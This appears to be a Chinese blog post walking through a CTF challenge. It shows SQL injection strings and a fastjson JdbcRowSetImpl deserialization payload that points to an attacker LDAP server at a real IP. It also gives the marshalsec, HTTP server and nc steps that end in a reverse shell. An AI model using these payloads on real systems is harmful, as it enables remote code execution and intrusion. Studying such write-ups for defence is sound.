fastjson反序列化漏洞

2022-10-11 21:18:17 125 0
魁首哥

2020结束的网鼎杯比赛,一题Think_java大多数师傅都是用的自己构造的java反序列化来做的。正好当时用fastjson写出来了。

近些天也在挖洞,对于很多json传输的数据也会尝试一下fastjson的payload。

那就正好一起来看当时如何利用fastjson的,应该是个非预期吧,其实这个虽然说是ctf题目,但环境属实和实战没有区别,swagger-ui.html的fastjson。

之前看过fastjson作者的一篇文章,阿里的一个大佬,能够独立完成一个框架属实真的tql,fastjson连续好几年都被爆出漏洞,作者也是春节也忙着修复,可能这就是一份乐趣和成就感吧。

0x01:写在前面

拿到题目后,一开始通过审计代码发现代码

审计发现一个注入,dbname我们可控

尝试注入

 dbName=myapp#' and 1=2 union select name from myapp.user;#
dbName=myapp#' and 1=2 union select pwd from myapp.user;#  

注入处账户密码留作备用(后面思路转变为exp后发现 上面账号密码没有用)

admin

admin@Rrrr_ctf_asde

然后经过逆向注意到导入了

 io.swagger.annotations.ApiOperation;  

发现是个swagger

Swagger在平时日常工作中用过是个优秀的文档编辑器

那么直接访问swagger-ui.html

这里想到swagger还有fastjson库 可以将java对象转换成json

19年爆出很多rce漏洞。尝试进行查看

网上查询fastjson得知存在rce漏洞

这个文章真的写的非常详细,可以说是手把手教学

   

看到如下

这里很符合fastjson的反序列化漏洞 的json格式

访问得知如下

按着一步一步操作来,首先准备云服务器,并将仓库文件上传到云服务器中。

上传成功以后进行如下操作

首先进行测试

云服务器监听7777端口

在靶场执行

 {"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://121.36.19.222:7777/Exploit","autoCommit":true}}}  

发现有流量回显

那就继续按照文档往下做。

Cd进去进行查看

修改exploit.java的ip为云服务器ip

Javac Exploit.java编译执行后得到Exploit.class

继续进行按照如下步骤继续执行

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer #Exploit

执行成功如下所示,进行监听本地端口1389

python -m SimpleHTTPServer 80

Nc 监听本地的8888端口

提交payload

 {"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://121.36.19.222:1389/Exploit","autoCommit":true}}}  

执行后成功

成功弹到shell ,

执行cat /flag可以得到如下flag

0x02:总结

日常实战中,喜欢burp带上fastjson的检测脚本,遇到可疑的就发包检测一下。显示有漏洞就尝试payload打一下dnslog试试回显,再进一步进行深挖。

收藏
分享
海报
0 条评论
125
上一篇:为什么选择 Node.js 作为 Web 应用程序? 下一篇:php和go写入MySQL速度谁更快?

本站已关闭游客评论,请登录或者注册后再评论吧~

忘记密码?

图形验证码